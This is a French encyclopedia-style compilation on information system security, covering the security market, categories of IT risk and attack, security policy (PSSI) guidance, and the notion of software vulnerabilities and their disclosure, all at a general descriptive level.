Marché de la sécurité informatique En 2011, le marché mondial représentait un chiffre d'affaires mondial de 17,7 milliards de dollars selon la société d'étude Gartner. Le leader de ce marché était le groupe californien Symantec avec 20 % des parts de marché, suivi de McAfee (7 %), puis Trend Micro (6,8%) et IBM (5 %)[5]. A titre de comparaison sur la même période, IDC classait premier Symantec ($3,6 milliards), puis Cisco ($1,7 milliard), McAfee ($1,7 milliard) suivi d’IBM, Check Point et Trend Micro (avec pour chacun environ $1,2 milliard de part de marché). En 2007, Kaspersky couvrait 38 % du marché français de l'anti-virus et 18 % des suites de protection pour l'Internet. Avec une offre de services globales, Thales Communications & Security est un acteur majeur de la cybersécurité et de la cyberdéfense s’adressant aux grandes organisations (États, grandes entreprises, infrastructures critiques)[6].

Dépenses gouvernementales Voici à titre de comparaison les budgets de quelques agences gouvernementales qui s'intéressent à la cybersécurité : • Cyber Command américain pour l'année 2013 : 182 millions de dollars américains[7]. • Agence nationale de la sécurité des systèmes d'information française : 90 millions d'euros pour l'année 2012[8]. • Bundesamt für Sicherheit in der Informationstechnik allemand : 70 millions d'euros en 2011[9].

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=S%C3%A9curit%C3%A9_des_syst%C3%A8mes_d%27information& action=edit [2][2]JF Pillou, Tout sur les systèmes d'information, Paris Dunod 2006, Collect° Commentcamarche.net

[3] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ Guide650-2006-09-12. pdf

[4] http:/ / fr. wikipedia. org/ wiki/ M%C3%A9thode_harmonis%C3%A9e_d%27analyse_des_risques

[5] Gartner Says Security Software Market Grew 7.5 Percent in 2011 (http:/ / www. gartner. com/ newsroom/ id/ 1996415)

[6] Pierre Tran, Thales Combines Cybersecurity Efforts (http:/ / www. defensenews. com/ story. php?i=6968682& c=EUR& s=TOP), Defense News, le 1 juillet 2011. [7] STATEMENT OF GENERAL KEITH B. ALEXANDER COMMANDER UNITED STATES CYBER COMMAND BEFORE THE HOUSE

COMMITTEE ON ARMED SERVICES SUBCOMMITTEE ON EMERGING THREATS AND CAPABILITIES (http:/ / www. au. af. mil/

au/ awc/ awcgate/ postures/ posture_cybercom_20mar2012. pdf)

[8] Définition de l'ANSSI sur le site tayo.fr (http:/ / www. tayo. fr/ anssi--agence-nationale-securite-des-systeme-information--definition-news. php)

[9] Bundesamt für Sicherheit in der Informationstechnik (BSI) (http:/ / www. sicherheitsforschung-europa. de/ servlet/ is/ 11988/ ) Insécurité du système d'information 12 Insécurité du système d'information

Il existe de nombreux risques en sécurité du système d'information, qui évoluent d'année en année. Le terme criminalité informatique, aussi appelé « cyber-criminalité », définit à mauvais titre les différentes attaques contre les systèmes informatiques, la plupart des attaques pouvant être classifiées comme des délits, et non des crimes. Ce terme est souvent employé comme FUD, généralement par les mêmes personnes qui considèrent les hackers comme des terroristes.

Mesure des risques Il importe de mesurer ces risques, non seulement en fonction de la probabilité ou de la fréquence de leurs survenances, mais aussi en mesurant leurs effets possibles. Ces effets, selon les circonstances et le moment où ils se manifestent, peuvent avoir des conséquences négligeables ou catastrophiques. Parfois, le traitement informatique en cours échoue, il suffit de le relancer, éventuellement par une autre méthode si on craint que la cause ne réapparaisse ; parfois l'incident est bloquant et on doit procéder à une réparation ou une correction avant de poursuivre le travail entrepris. Mais ces mêmes incidents peuvent avoir des conséquences beaucoup plus fâcheuses : •• données irrémédiablement perdues ou altérées, ce qui les rend inexploitables ; •• données ou traitements durablement indisponibles, pouvant entraîner l'arrêt d'une production ou d'un service ; •• divulgation d'informations confidentielles ou erronées pouvant profiter à des sociétés concurrentes ou nuire à l'image de l'entreprise ; •• déclenchement d'actions pouvant provoquer des accidents physiques ou induire des drames humains. À l'ère de la généralisation des traitements et des échanges en masse, on imagine assez bien l'impact que pourraient avoir des événements majeurs comme, par exemple, une panne électrique de grande ampleur ou la saturation du réseau Internet pendant plusieurs heures. Hormis ces cas exceptionnels, beaucoup de risques peuvent être anticipés et il existe des parades pour la plupart d'entre eux. On peut citer en exemple les précautions prises peu avant l'an 2000 qui, même si la réalité du risque a parfois été (et reste aujourd'hui) controversée, ont peut-être évité de graves désagréments. Chaque organisation, mais aussi chaque utilisateur, a tout intérêt à évaluer, même grossièrement, les risques qu'il court et les protections raisonnables qu'elle ou il peut mettre en œuvre. Dans le monde professionnel, les risques et les moyens de prévention sont essentiellement évalués en raison de leurs coûts. Il est par exemple évident qu'une panne qui aurait pour conséquence l'arrêt de la production d'une usine pendant une journée mérite qu'on consacre pour la prévenir une somme égale à une fraction de la valeur de sa production quotidienne ; cette fraction sera d'autant plus importante que la probabilité et la fréquence d'une telle panne sont élevées.

Risques humains Les risques humains sont les plus importants, même s'ils sont le plus souvent ignorés ou minimisés. Ils concernent les utilisateurs mais également les informaticiens eux-mêmes. • La maladresse : comme en toute activité, les humains commettent des erreurs ; il leur arrive donc plus ou moins fréquemment d'exécuter un traitement non souhaité, d'effacer involontairement des données ou des programmes, etc. •L'inconscience et l'ignorance : de nombreux utilisateurs d'outils informatiques sont encore inconscients ou ignorants des risques qu'ils encourent aux systèmes qu'ils utilisent, et introduisent souvent des programmes malveillants sans le savoir. Des manipulations inconsidérées (autant avec des logiciels que physiques) sont aussi courantes. Insécurité du système d'information 13

• La malveillance : aujourd'hui, il serait quasiment inconcevable de prétexter l'ignorance des risques sus-cités, tant les médias ont pu parler des différents problèmes de virus et de vers ces dernières années (même s'ils ont tendance, en vulgarisant, à se tromper sur les causes et les problèmes). Ainsi, certains utilisateurs, pour des raisons très diverses, peuvent volontairement mettre en péril le système d'information, en y introduisant en connaissance de cause des virus (en connectant par exemple un ordinateur portable sur un réseau d'entreprise), ou en introduisant volontairement de mauvaises informations dans une base de données. De même il est relativement aisé pour un informaticien d'ajouter délibérément des fonctions cachées lui permettant, directement ou avec l'aide de complices, de détourner à son profit de l'information ou de l'argent. •L'ingénierie sociale : l'ingénierie sociale (social engineering en anglais) est une méthode pour obtenir d'une personne des informations confidentielles, que l'on n'est pas normalement autorisé à obtenir, en vue de les exploiter à d'autres fins (publicitaires par exemple). Elle consiste à se faire passer pour quelqu’un que l’on n'est pas (en général un administrateur) et de demander des informations personnelles (nom de connexion, mot de passe, données confidentielles, etc.) en inventant un quelconque prétexte (problème dans le réseau, modification de celui-ci, heure tardive, etc.). Elle peut se faire soit au moyen d’une simple communication téléphonique, soit par courriel, soit en se déplaçant directement sur place. •L'espionnage : l'espionnage, notamment industriel, emploie les mêmes moyens, ainsi que bien d'autres (influence), pour obtenir des informations sur des activités concurrentes, procédés de fabrication, projets en cours, futurs produits, politique de prix, clients et prospects, etc. • Le détournement de mot de passe : un administrateur système ou réseau peut modifier les mots de passe d'administration lui permettant de prendre le contrôle d'un système ou d'un réseau. (voir le cas de Terry Childs). Dans les approches de type ingénierie des connaissances, le capital humain est considéré comme l'une des trois composantes du capital immatériel de l'entreprise.

Risques techniques Les risques techniques sont tout simplement ceux liés aux défauts et pannes inévitables que connaissent tous les systèmes matériels et logiciels. Ces incidents sont évidemment plus ou moins fréquents selon le soin apporté lors de la fabrication et des tests effectués avant que les ordinateurs et les programmes ne soient mis en service. Cependant les pannes ont parfois des causes indirectes, voire très indirectes, donc difficiles à prévoir. • Incidents liés au matériel : si on peut le plus souvent négliger la probabilité d'une erreur d'exécution par un processeur (il y eut néanmoins une exception célèbre avec l'une des toutes premières générations du processeur Pentium d'Intel qui pouvait produire, dans certaines circonstances, des erreurs de calcul), la plupart des composants électroniques, produits en grandes séries, peuvent comporter des défauts et finissent un jour ou l'autre par tomber en panne. Certaines de ces pannes sont assez difficiles à déceler car intermittentes ou rares. • Incidents liés au logiciel : ils sont de très loin les plus fréquents ; la complexité croissante des systèmes d'exploitation et des programmes nécessite l'effort conjoint de dizaines, de centaines, voire de milliers de programmeurs. Individuellement ou collectivement, ils font inévitablement des erreurs que les meilleures méthodes de travail et les meilleurs outils de contrôle ou de test ne peuvent pas éliminer en totalité. Des failles permettant de prendre le contrôle total ou partiel d'un ordinateur sont régulièrement rendues publiques et répertoriées sur des sites comme SecurityFocus ou Secunia. Certaines failles ne sont pas corrigées rapidement par leurs auteurs (cf les listes actualisées des « unpatched vulnerabilities » sur Secunia[1]). Certains programmes sont conçus pour communiquer avec internet et il n'est donc pas souhaitable de les bloquer complètement par un pare-feu (navigateur web par exemple). • Incidents liés à l'environnement : les machines électroniques et les réseaux de communication sont sensibles aux variations de température ou d'humidité (tout particulièrement en cas d'incendie ou d'inondation) ainsi qu'aux champs électriques et magnétiques. Il n'est pas rare que des ordinateurs connaissent des pannes définitives ou intermittentes à cause de conditions climatiques inhabituelles ou par l'influence d'installations électriques Insécurité du système d'information 14

notamment industrielles (et parfois celle des ordinateurs eux-mêmes). Pour s'en prémunir, on recourt généralement à des moyens simples bien que parfois onéreux : • Redondance des matériels : la probabilité ou la fréquence de pannes d'un équipement est représentée par un nombre très faible (compris entre 0 et 1, exprimé sous la forme 10-n). En doublant ou en triplant (ou plus) un équipement, on divise le risque total par la probabilité de pannes simultanées. Le résultat est donc un nombre beaucoup plus faible ; autrement dit l'ensemble est beaucoup plus fiable (ce qui le plus souvent reporte le risque principal ailleurs). • Dispersion des sites : Un accident (incendie, tempête, tremblement de terre, attentat, etc.) a très peu de chance de se produire simultanément en plusieurs endroits distants. • Programmes ou procédures de contrôle indépendants : ils permettent bien souvent de déceler les anomalies avant qu'elles ne produisent des effets dévastateurs.

Risques juridiques L'ouverture des applications informatiques par le web et la multiplication des messages électroniques augmentent les risques juridiques liés à l'usage des technologies de l'information. On peut citer notamment : • le non-respect de la législation relative à la signature numérique ; • les risques concernant la protection du patrimoine informationnel ; • le non-respect de la législation relative à la vie privée ; • le non-respect des dispositions légales relatives au droit de la preuve, dont les conditions d'application en droit civil sont différentes de celles de la Common law, et une mauvaise gestion des documents d'archive.

Liste des risques Attention, les risques évoluant jour après jour, cette liste n'est pas exhaustive.

Programmes malveillants Un logiciel malveillant (malware en anglais) est un logiciel développé dans le but de nuire à un système informatique. Voici les principaux types de programmes malveillants : • Le virus : programme se dupliquant sur d'autres ordinateurs ; • Le ver (worm en anglais) : exploite les ressources d'un ordinateur afin d'assurer sa reproduction ; • Le wabbit : programme qui se réplique par lui-même (mais qui n'est ni un virus, ni un ver) ; • Le cheval de Troie (trojan en anglais) : programme à apparence légitime (voulue) qui exécute des routines nuisibles sans l'autorisation de l'utilisateur ; • La porte dérobée (backdoor en anglais) : ouvreur d'un accès frauduleux sur un système informatique, à distance ; • Le logiciel espion (spyware en anglais) : collecteur d'informations personnelles sur l'ordinateur d'un utilisateur sans son autorisation, et en envoyant celles-ci à un organisme tiers ; •L'enregistreur de frappe (keylogger en anglais) : programme généralement invisible installé sur le poste d'un utilisateur et chargé d'enregistrer à son insu ses frappes clavier ; •L'exploit : programme permettant d'exploiter une faille de sécurité d'un logiciel ; • Le rootkit : ensemble de logiciels permettant généralement d'obtenir les droits d'administrateur sur une machine, d'installer une porte dérobée, de truquer les informations susceptibles de révéler la compromission, et d'effacer les traces laissées par l'opération dans les journaux système. Insécurité du système d'information 15

Techniques d'attaque par messagerie En dehors des nombreux programmes malveillants qui se propagent par la messagerie électronique, il existe des attaques spécifiques à celle-ci : • Le pourriel (spam en anglais) : un courrier électronique non sollicité, la plupart du temps de la publicité. Ils encombrent le réseau, et font perdre du temps à leurs destinataires •L'hameçonnage (phishing en anglais) : un courrier électronique dont l'expéditeur se fait généralement passer pour un organisme financier et demandant au destinataire de fournir des informations confidentielles • Le canular informatique (hoax en anglais) : un courrier électronique incitant généralement le destinataire à retransmettre le message à ses contacts sous divers prétextes. Ils encombrent le réseau, et font perdre du temps à leurs destinataires. Dans certains cas, ils incitent l'utilisateur à effectuer des manipulations dangereuses sur son poste (suppression d'un fichier prétendument lié à un virus par exemple).

Attaques sur le réseau Voici les principales techniques d'attaques sur le réseau : • Le sniffing : technique permettant de récupérer toutes les informations transitant sur un réseau (on utilise pour cela un logiciel sniffer). Elle est généralement utilisée pour récupérer les mots de passe des applications qui ne chiffrent pas leurs communications, et pour identifier les machines qui communiquent sur le réseau. • La mystification (en anglais spoofing) : technique consistant à prendre l'identité d'une autre personne ou d'une autre machine. Elle est généralement utilisée pour récupérer des informations sensibles, que l'on ne pourrait pas avoir autrement. • Le déni de service (en anglais denial of service) : technique visant à générer des arrêts de service, et ainsi d’empêcher le bon fonctionnement d’un système. Et d'autres techniques plus subtiles : •• Hijacking • Attaque de l'homme du milieu (MITM) •• Fragments attacks •• Tiny Fragments •• Fragment Overlapping •• TCP Session Hijacking

Attaques sur les mots de passe Les attaques sur les mots de passe peuvent consister à faire de nombreux essais jusqu’à trouver le bon mot de passe. Dans ce cadre, notons les deux méthodes suivantes: •L'attaque par dictionnaire : le mot testé est pris dans une liste prédéfinie contenant les mots de passe les plus courants et aussi des variantes de ceux-ci (à l’envers, avec un chiffre à la fin, etc.). Ces listes sont généralement dans toutes les langues les plus utilisées, contiennent des mots existants, ou des diminutifs (comme “powa” pour “power”, ou “G0d” pour “god”). •L'attaque par force brute : toutes les possibilités sont faites dans l’ordre jusqu’à trouver la bonne solution (par exemple de “aaaaaa” jusqu'à “ZZZZZZ” pour un mot de passe composé strictement de six caractères alphabétiques). Insécurité du système d'information 16

Cartographie du réseau

Reconnaissance passive La première démarche pour cartographier un réseau est d'utiliser un ensemble de techniques non intrusives (qui ne pourront pas être détectée) : • Utilisation de ressources publiques : le Web, Usenet • Les outils réseau : Whois, nslookup Cette démarche permet d'obtenir des informations sur la cible, diffusées publiquement, mais pouvant être confidentielles (diffusées généralement par erreur ou insouciance).

Reconnaissance semi-active Bien que non intrusives, les techniques suivantes deviennent détectables par la cible, notamment à l'aide d'un système de détection d'intrusion : • ping, traceroute et utilisation des propriétés du protocole ICMP • Balayage de port (port scan en anglais) via Nmap ou AutoScan-Network • Prise d'empreinte TCP/IP (TCP/IP fingerprinting en anglais) Ces techniques permettent généralement de recenser et d'identifier une grande partie des éléments du réseau cible.

Reconnaissance active Ici, on passe dans les techniques réellement intrusives, donc clairement détectables, mais ne représentant pas un risque immédiat pour la cible : • Utilisation des propriétés des protocoles SNMP, SMB, RPC. • Détection automatisée de vulnérabilités : Nessus

Techniques d'intrusion système •• Connexion à une ressource partagée •• Attaque par force brute • Attaque par débordement de tampon • Accès à un interpréteur de commandes interactif •• Élévation des privilèges • Installation d'un rootkit • Effacement des traces

Autres types d'attaques On peut noter qu'il existe d'autres types d'attaques, souvent moins connues car nécessitant des compétences très pointues : • le cassage de logiciel (Cracking en version anglaise) : cette technique a pour but la modification d'un programme pour déjouer sa protection (en général pour permettre une utilisation complète, ou à durée illimitée) ; • la cryptanalyse ; • la rétro-ingénierie ; • Stacks Overflows et Heap Overflows (dépassement de tampon), écriture de shellcode ; •• exploitation des « format bugs » ; • snarfing ; • détournement et utilisation de données Web : Cookie, CSS, CGI, vulnérabilités concernant les langages PHP, ASP, SQL, etc. Insécurité du système d'information 17

Et il en existe d'autres ne nécessitant aucune compétence ou presque : • Messenger Spam : envoi de pourriels directement sur l'adresse IP et ouverture d'une fenêtre intruse (pop-up en version anglaise) ; cette attaque est gênante mais généralement peu nuisible et nécessite un système Microsoft Windows possédant le programme messenger installé (à ne pas confondre avec le logiciel exploitant MSN) et un accès au réseau local (si la cible est derrière un routeur NAT celle-ci ne pourra pas être atteinte).

Technique d'évasion Ces techniques permettent, par différentes méthodes, de cacher au système de détection (généralement un IDS) les informations nécessaires à la détection d'une attaque (ARP poisoning, spoofing, modifications des règles de l'IDS[réf. nécessaire]).

Notes et références

[1] secunia.com (http:/ / secunia. com/ product/ )

Politique de sécurité du système d'information

La politique de sécurité des systèmes d'information (PSSI) est un plan d'actions définies pour maintenir un certain niveau de sécurité. Elle reflète la vision stratégique de la direction de l'organisme (PME, PMI, industrie, administration, État, unions d'États …) en matière de sécurité des systèmes d'information (SSI).

Dépendance et dissociation La politique de sécurité des systèmes d'information est intrinsèquement liée à la sécurité de l'information. Aussi, un système d'information n'étant pas limité au système informatique, une politique de sécurité des systèmes d'information ne se limite pas à la sécurité informatique.

Description La PSSI constitue le principal document de référence en matière de SSI de l'organisme. Elle en est un élément fondateur définissant les objectifs à atteindre et les moyens accordés pour y parvenir. La démarche de réalisation de cette politique est basée sur une analyse des risques en matière de sécurité des systèmes d'information. Après validation par les différents acteurs de la sécurité de l'information de l'organisme, la PSSI doit être diffusée à l'ensemble des acteurs du système d'information (utilisateurs, exploitants, sous-traitants, prestataires …). Elle constitue alors un véritable outil de communication sur l'organisation et les responsabilités SSI, les risques SSI et les moyens disponibles pour s'en prémunir. La sécurité du système d'information se base traditionnellement sur la mise en œuvre d'infrastructures à clés publiques (Public key infrastructure - PKI). De l'avis des experts [1], la mise en œuvre d'une infrastructure à clés publiques dans un monde ouvert n'est pas véritablement efficace sans certaines précautions. Dans les grandes organisations en réseau, il faut intégrer l'analyse de la sécurité des données dans une réflexion plus large sur le cadre juridique et la mise en œuvre de registres de métadonnées. Par exemple, pour tout ce qui touche aux applications industrielles de la recherche (voir Dictionnaire de métadonnées pour le référentiel des publications CNRS [2]), une réflexion approfondie s'impose sur l'utilisation du certificat électronique, par rapport aux éléments et raffinements employés. Politique de sécurité du système d'information 18

Élaboration d'une politique de sécurité du système d'information En France, la DCSSI a élaboré entre 2002 et 2004 un guide pour la politique de sécurité du système d'information. Il se compose de quatre sections : 1.1.Introduction 2.2.Méthodologie 3.3.Principes de sécurité 4.4.Références SSI Ce document est une mise à jour de documents datant de 1994.

Introduction Voir détails : Section 1 - Introduction [3] Le guide définit les concepts, outre la PSSI : •• les principes de sécurité, •• les règles de sécurité. Il définit le champ d'application et les acteurs auxquels le guide est destiné : •• Fonctionnaires de sécurité des systèmes d'information (FSSI) dans les administrations, • Responsables de la sécurité des systèmes d'information (RSSI) dans les entreprises). Il prend acte de la nouvelle nature des menaces : globales et transfrontières du fait de l'interconnexion des réseaux internet. Il définit trois types de patrimoine à protéger : • Patrimoine matériel, •• Patrimoine immatériel • Informations relatives aux personnes, physiques et morales (les données personnelles [4] de la Loi Informatique et Libertés). Il définit la place de la PSSI dans le référentiel, en particulier : • les liens entre la PSSI et les lignes directrices de l'OCDE, • les liens entre la PSSI et les critères communs. Il indique les bases de légitimité des règles d'une PSSI : • Lois, réglementations, normes, et recommandations issues d'instances internationales, nationales, ou professionnelles. Les règles trouvent également leur justification dans les composantes de la culture de l'organisme (traditions, règlements internes). • Règles d'éthique : •• Principes internationaux, • Codes d'éthique par secteurs professionnels, • Codes d'éthique des métiers des technologies de l'information. • Principes de protection des intérêts vitaux de l'État : •• La protection des éléments non classifiés de défense, • Les informations relevant du secret de défense : • Protection du secret et des informations concernant la défense nationale et la sûreté de l'État (IGI 1300) • La sécurité des systèmes d'information qui font l'objet d'une classification de défense pour eux-mêmes ou pour les informations traitées (IGI 900), • La protection du secret entre la France et les États étrangers (II 50), Politique de sécurité du système d'information 19

•• La protection du secret pour la protection des marchés et autres contrats (II 2000). • Principes de préservation des intérêts de l'organisme, en particulier les exigences vis-à-vis : •• des fournisseurs, •• des prestataires de services, •• de la sous-traitance, •• des autres organismes.

Méthodologie Voir détails : Section 2 - Méthodologie [5]

Principes de sécurité Voir détails : Section 3 - Principes de sécurité [6] La section 3 aborde les différents domaines de la sécurité généralement couverts par une PSSI : Principes organisationnels •• Politique de sécurité •• Organisation de la sécurité • Gestion des risques SSI • Sécurité et cycle de vie • Assurance et certification Principes de mise en œuvre •• Aspects humains •• Planification de la continuité des activités •• Gestion des incidents • Sensibilisation et formation •• Exploitation •• Aspects physiques et environnement Principes techniques • Identification / authentification • Contrôle d'accès logique aux biens •• Journalisation •• Infrastructures de gestion des clés cryptographiques •• Signaux compromettants

Références SSI Voir détails : Section 4 - Références SSI [7] Les critères communs pour l'évaluation de la sécurité des technologies de l'information Les lignes directrices de l'OCDE Codes d'éthique des métiers des technologie de l'information Les atteintes aux personnes Les atteintes aux biens Les atteintes aux intérêts fondamentaux de la nation, terrorisme et atteinte à la confiance publique Les atteintes à la propriété intellectuelle Les dispositions relatives à la cryptologie Politique de sécurité du système d'information 20

Les dispositions relatives à la signature électronique

Déclinaisons

Sécurité globale et interopérabilité informatique Un problème très grave que l'on rencontre avec l'arrivée du web sémantique est que les données qui décrivent des événements (sécurité, gestion comptable), ne sont pas gérées pour interopérer d'une façon sémantique. Le passage au web sémantique demande de rapprocher les événements autrement que par le seul lien temporel. Il faut donc disposer d'un métaframework qui fournisse la sémantique des données et les langages de description. Techniquement, cela revient à réaliser le lien routeurs de réseau-bases de données, en introduisant la sémantique des données et les langages de description (par exemple les langages de description des formats de documents). Cette prise de conscience initiale est nécessaire avant d'articuler la PSSI globale en politiques de sécurité techniques.

Passer des principes de SSI globale à des politiques spécialisées Une fois les risques les plus graves identifiés, on peut se poser la question de décliner la PSSI globale en politiques de sécurité techniques par métier, activités ou systèmes. La PSSI globale servira également de base de cohérence entre ces politiques et entre toutes les études de sécurité. Ainsi, on peut retrouver comme différents types de politiques de sécurité liées à la sécurité de l'information ou des données : •• Politique de sécurité informatique •• Politique de sécurité du réseau informatique •• Politique de sécurité système

Annexes

Bibliographie • (fr) OCTO Technology, ouvrage collectif, Gestion des Identités : Une Politique pour le Système d'Information, OCTO Technology, 2007, ISBN 2952589518. • (fr) Vuibert Sciences, Guinier D. - Chapitre : La politique de sécurité, pp. 1486-1498, in l'encyclopédie de l'informatique et des systèmes d'information, 2088 pages, Vuibert Sciences, 2006, ISBN 9782711748464.

Liens externes • ANSSI : Guide d'élaboration de politiques de sécurité des systèmes d'information [8] • Guide de sensibilisation du MEDEF à la sécurité informatique et à la protection du patrimoine informationnel [9] • Publication sur "la sécurité des systèmes d'information des établissements de santé" éditée par le GMSIH [10]

• Portail de la sécurité de l’information Politique de sécurité du système d'information 21

Références

[1] http:/ / solutions. journaldunet. com/ itws/ 020205_it_pkiernstyoung. shtml

[2] http:/ / artist. inist. fr/ IMG/ doc/ CnrsMetaV5. doc

[3] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ pssi-section1-introduction-2004-03-03. pdf

[4] http:/ / www. donneespersonnelles. fr/ qu-est-ce-qu-une-donnee-personnelle

[5] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ pssi-section2-methodologie-2004-03-03. pdf

[6] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ pssi-section3-principes-2004-03-03. pdf

[7] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ pssi-section4-referencesssi-2004-03-03. pdf

[8] http:/ / www. ssi. gouv. fr/ pssi/

[9] http:/ / www. medef. fr/ staging/ site/ core. php?pag_id=36442

[10] http:/ / www. gmsih. fr/ fre/ nos_publications/ articles_publications/ securite_des_systemes_d_information_des_etablissements_de_sante

Vulnérabilité (informatique)

Cet article concerne la vulnérabilité en informatique. Pour une utilisation plus large du terme, voir Vulnérabilité. Dans le domaine de la sécurité informatique, une vulnérabilité ou faille est une faiblesse dans un système informatique, permettant à un attaquant de porter atteinte à l'intégrité de ce système, c'est-à-dire à son fonctionnement normal, à la confidentialité et l'intégrité des données qu'il contient. Ces vulnérabilités sont la conséquence de faiblesses dans la conception, la mise en œuvre ou l'utilisation d'un composant matériel ou logiciel du système, mais il s'agit généralement de l'exploitation de bugs logiciels. Ces dysfonctionnements logiciels sont en général corrigés à mesure de leurs découvertes, c'est pourquoi il est important de maintenir les logiciels à jour avec les correctifs fournis par les éditeurs de logiciels. Il arrive que la procédure d'exploitation d'une faille d'un logiciel soit publiquement documentée et utilisable sous la forme d'un petit logiciel appelé exploit.

Causes Les vulnérabilités informatiques proviennent souvent de la négligence ou de l'inexpérience d'un programmeur. Il peut y avoir d'autres causes liées au contexte. Une vulnérabilité permet généralement à l'attaquant de duper l'application, par exemple en outrepassant les vérifications de contrôle d'accès ou en exécutant des commandes sur le système hébergeant l'application. Quelques vulnérabilités surviennent lorsque l'entrée d'un utilisateur n'est pas contrôlée, permettant l'exécution de commandes ou de requêtes SQL (connues sous le nom d'injection SQL). D'autres proviennent d'erreurs d'un programmeur lors de la vérification des buffers de données (qui peuvent alors être dépassés), causant ainsi une corruption de la pile mémoire (et ainsi permettre l'exécution de code fourni par l'attaquant).

Publication d'une vulnérabilité

Méthode de publication La méthode de publication des vulnérabilités est un sujet qui fait débat au sein de la communauté de la sécurité des systèmes d'information. Certains affirment qu'il est nécessaire de publier immédiatement toutes les informations à propos d'une vulnérabilité dès qu'elle a été découverte (full disclosure). D'autres prétendent qu'il est préférable de limiter en premier lieu la publication uniquement aux utilisateurs qui en ont un besoin important (divulgation responsable, voire coordonnée), puis après un certain délai, de publier en détail, s'il y a besoin. Ces délais peuvent permettre de laisser le temps aux développeurs de corriger la vulnérabilité et à ces utilisateurs d'appliquer les patchs de sécurité nécessaires, mais peuvent aussi accroître les risques pour ceux qui n'ont pas ces informations. Les éditeurs de logiciels appellent cette méthode de publication la « divulgation responsable » et Vulnérabilité (informatique) 22

encouragent les chercheurs en sécurité à l'utiliser. En théorie, ces délais permettent aux éditeurs de publier les correctifs nécessaires pour protéger leurs logiciels et leurs utilisateurs, mais en pratique, cela ne les contraint pas à corriger les vulnérabilités. Il a ainsi pu arriver que certaines vulnérabilités soient restées non corrigées pendant des mois voire des années, tant qu'aucun exploit n'a été publié. Devant cette situation, certains ont décidé de laisser un délai - considéré raisonnable - aux éditeurs pour corriger les vulnérabilités avant de les divulguer. Ainsi la société TippingPoint laisse un délai de 6 mois avant de divulguer les détails d'une vulnérabilité[1].

Date et source de publication La date de publication est la première date à laquelle une vulnérabilité est décrite sur un média. L'information révélée suit les conditions suivantes : – l'information est disponible librement et publiquement ; – l'information sur la vulnérabilité est publiée par une source indépendante et de confiance ; – la vulnérabilité a fait l'objet d'analyse par des experts, notamment sur l'estimation du risque de la révélation. D'un point de vue sécurité, seule une publication libre d'accès et complète peut assurer que toutes les parties intéressées obtiennent l'information appropriée. La sécurité par l'obscurité est un concept qui n'a jamais fonctionné. La source de la publication doit être indépendante d'un éditeur, d'un vendeur, ou d'un gouvernement. Elle doit être impartiale pour permettre une diffusion de l'information juste et critique. Un média est considéré comme « de confiance » lorsqu'il est une source de la sécurité des systèmes d'information largement acceptée dans l'industrie (par exemple : CERT, CESTI, Securityfocus, Secunia). L'analyse et l'estimation du risque assurent la qualité de l'information révélée. Une unique discussion sur une faille potentielle dans une liste de diffusion ou une vague information d'un vendeur ne permettent donc pas de qualifier une vulnérabilité. L'analyse doit inclure assez de détails pour permettre à un utilisateur concerné d'évaluer lui-même son risque individuel, ou de prendre une mesure immédiate pour se protéger.

Référence Lorsqu'une vulnérabilité a été publiée, le MITRE lui attribue un identifiant CVE. Cet identifiant permet de faire des recherches croisées entre plusieurs sources d'information.

Identification et correction des vulnérabilités Il existe de nombreux outils qui peuvent faciliter la découverte de vulnérabilités sur un système information, certains permettant leur suppression. Mais, bien que ces outils puissent fournir à un auditeur une bonne vision d'ensemble des vulnérabilités potentiellement présentes, ils ne peuvent pas remplacer le jugement humain. Se reposer uniquement sur des scanners automatiques de vulnérabilité rapportera de nombreux faux positifs et une vue limitée des problèmes présents dans le système. Des vulnérabilités ont été trouvées dans tous les principaux systèmes d'exploitation, en premier lieu sur Windows, mais aussi sur Mac OS, différentes versions d'Unix et Linux, OpenVMS, et d'autres. La seule manière de réduire la probabilité qu'une vulnérabilité puisse être exploitée est de rester constamment vigilant, en développant la maintenance système (par exemple en appliquant les patchs de sécurité), de déployer une architecture sécurisée (par exemple en plaçant judicieusement des pare-feu), de contrôler les accès, et de mettre en place des audits de sécurité (à la fois pendant le développement et pendant le cycle de vie). Vulnérabilité (informatique) 23

Exploitation malveillante Les failles de sécurité deviennent particulièrement intéressantes lorsqu'un programme contenant une de ces vulnérabilités est lancé avec des privilèges spéciaux, qu'il permet une authentification sur un système, ou bien encore lorsqu'il fournit un accès à des données sensibles. Les Crackers et non "hackers", grâce à leur connaissance et à des outils appropriés, peuvent prendre le contrôle de machines vulnérables. Les failles de sécurité découvertes sont généralement colmatées au plus vite à l'aide d'un patch, afin d'empêcher des prises de contrôles intempestives ; cependant dans bien des cas, des machines restent vulnérables à des failles anciennes, les différents correctifs n'ayant pas été appliqués. Certains logiciels malveillants utilisent des vulnérabilités pour infecter un système, se propager sur un réseau, etc. L'exploitation d'une faille peut provoquer un déni de service du système (programme informatique, noyau du système d'exploitation, etc.), un accès à un système ou à des informations sensibles, voire une élévation des privilèges d'un utilisateur. On parle de faille distante lorsque la vulnérabilité se situe dans un logiciel constituant un service réseau (par exemple un serveur Web) et qu'elle peut être exploitée par un attaquant distant, qui ne dispose pas d'un compte local. Les vulnérabilités locales peuvent être utilisées par un utilisateur malintentionné, qui possède un compte, pour effectuer une élévation des privilèges, ou bien par un attaquant distant pour augmenter ses privilèges, après l'exploitation d'une vulnérabilité distante. On parle de faille locale lorsque la vulnérabilité n'est exploitable que par un utilisateur disposant d'un compte local. Les vulnérabilités distantes peuvent être utilisées par des attaquants pour obtenir un accès sur un système.

Exemples de vulnérabilités Les vulnérabilités ci-dessous font partie des plus connues : • dépassement de tampon ; • injection SQL ; • cross site scripting.

Annexes

Références

[1] ZDI Disclosure Policy Changes (http:/ / dvlabs. tippingpoint. com/ blog/ 2010/ 08/ 03/ zdi-disclosure-changes), par Aaron Portnoy (Tipping Point), le

Liens externes

• (en) OSVDB (http:/ / www. osvdb. org/ ) : Liste open source des vulnérabilités

• (en)(fr) scip VulDB (http:/ / www. scip. ch/ fr/ ?vuldb) : Liste open des vulnérabilités

• (en)(fr) Définition et liste des vulnérabilités sur le site de Microsoft (http:/ / technet. microsoft. com/ fr-fr/ library/

cc751383(en-us). aspx)

